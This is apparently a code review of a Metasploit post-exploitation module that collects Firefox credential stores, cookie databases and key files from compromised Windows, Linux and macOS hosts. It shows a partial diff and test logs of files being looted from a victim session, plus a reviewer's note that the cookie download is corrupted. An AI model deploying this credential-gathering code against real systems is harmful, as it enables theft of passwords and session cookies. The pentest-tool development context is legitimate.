modules/post/multi/gather/firefox_creds.rb

```diff
@@ -79,249 +81,316 @@ def run
-      print_error("Firefox not found")
+      print_error("Firefox was not found (Missing profiles.ini)")
       return
     end
 
     session.fs.dir.foreach(path) do |fdir|
-      if fdir =~ /Firefox/i and @platform == :windows
-        paths << path + fdir + "Profiles\\"
-        print_good("Found Firefox installed")
-        break
-      else
-        paths << path + fdir
-        print_status("Found Firefox installed")
-        break
-      end
+      #print_status("Found a Firefox directory: #{path + fdir}")
+      ffpath << path + fdir
+      break
     end
 
-    if paths.empty?
-      print_error("Firefox not found")
+    if ffpath.empty?
+      print_error("Firefox was not found")
       return
     end
 
-    print_status("Locating Firefox Profiles...")
-    print_line("")
-    path += "Firefox\\Profiles\\"
+    #print_status("Locating Firefox profiles")
+    path << "Firefox\\Profiles\\"
 
-    # we should only have profiles in the Profiles directory store them all
+    # We should only have profiles in the Profiles directory store them all
     begin
       session.fs.dir.foreach(path) do |pdirs|
         next if pdirs == "." or pdirs == ".."
-        print_good("Found Profile #{pdirs}")
+        vprint_good("Found profile: #{path + pdirs}")
         paths << path + pdirs
       end
     rescue
-      print_error("Profiles directory missing")
+      print_error("Profiles directory is missing")
       return
     end
 
-    if paths.empty?
-      return nil
-    else
-      return paths
+    paths.empty? ? (nil) : (paths)
+  end
+
+
+  def download_loot(paths)
+    loot = ""
+    print_line
+
+    paths.each do |path|
+      print_status("Profile: #{path}")
+
+      #   win: C:\Users\administrator\AppData\Roaming\Mozilla\Firefox\Profiles\tsnwjx4g.default
+      # linux: /root/.mozilla/firefox/tsnwjx4g.default         (iceweasel)
+      #   osx: /Users/mbp/Library/Application Support/Firefox/Profiles/tsnwjx4g.default
+      profile = path.scan(/Profiles[\\|\/](.+)\.(.+)$/).flatten[0].to_s
+      profile = path.scan(/firefox[\\|\/](.+)\.(.+)$/).flatten[0].to_s if profile.empty?
+
+      session.type == "meterpreter" ? (files = session.fs.dir.foreach(path)) : (files = session.shell_command("ls #{path} 2>/dev/null").split())
+
+      files.each do |file|
+        file.chomp!
+        if file =~ /^key\d\.db$/ or file =~ /^cert\d\.db$/ or file =~ /^signons.sqlite$/i or file =~ /^cookies\.sqlite$/ or file =~ /^logins\.json$/
+          ext = file.split('.')[2]
+          ext == "txt" ? (mime = "plain") : (mime = "binary")
+          vprint_status("Downloading: #{file}")
+          if @platform == :windows
+            p = store_loot("ff.#{profile}.#{file}", "#{mime}/#{ext}", session, "firefox_#{file}")
+            session.fs.file.download_file(p, path + "\\" + file)
+          else   # windows has to be meterpreter, so can be anything else (unix, bsd, linux, osx)
+            loot = session.shell_command("cat #{path}//#{file}")
```

Comment:
cmd_exec should be used instead session.shell_command.

On the other hand the download isn't working correctly on my tests:

```
msf post(firefox_creds) > run

[*] Checking for Firefox profile in: /home/juan/.mozilla/firefox/

[*] Profile: /home/juan/.mozilla/firefox/7xzgfxiq.default
[+] Downloaded cert8.db: /Users/jvazquez/.msf4/loot/20150821153914_default_172.16.158.137_ff.7xzgfxiq.cert_670320.db
[+] Downloaded cookies.sqlite: /Users/jvazquez/.msf4/loot/20150821153919_default_172.16.158.137_ff.7xzgfxiq.cook_428519.bin
[+] Downloaded key3.db: /Users/jvazquez/.msf4/loot/20150821153924_default_172.16.158.137_ff.7xzgfxiq.key3_187893.db


[*] Post module execution completed
```

Checking the cookies.sqlite downloaded file:

```
aus-mac-0916:~ jvazquez$ file /Users/jvazquez/.msf4/loot/20150821153919_default_172.16.158.137_ff.7xzgfxiq.cook_428519.bin
/Users/jvazquez/.msf4/loot/20150821153919_default_172.16.158.137_ff.7xzgfxiq.cook_428519.bin: DOS executable (device driver)
aus-mac-0916:~ jvazquez$ ls -la /Users/jvazquez/.msf4/loot/20150821153919_default_172.16.158.137_ff.7xzgfxiq.cook_428519.bin
-rw-r--r--  1 jvazquez  Users 147456 Aug 21 15:39 /Users/jvazquez/.msf4/loot/20150821153919_default_172.16.158.137_ff.7xzgfxiq.cook_428519.bin
```

The original file:

```
juan@ubuntu:~$ cd .mozilla/firefox/7xzgfxiq.default/
juan@ubuntu:~/.mozilla/firefox/7xzgfxiq.default$ pwd
/home/juan/.mozilla/firefox/7xzgfxiq.default
juan@ubuntu:~/.mozilla/firefox/7xzgfxiq.default$ ls -la cookies.sqlite
-rw-r--r-- 1 juan juan 524288 Aug 21 13:38 cookies.sqlite
```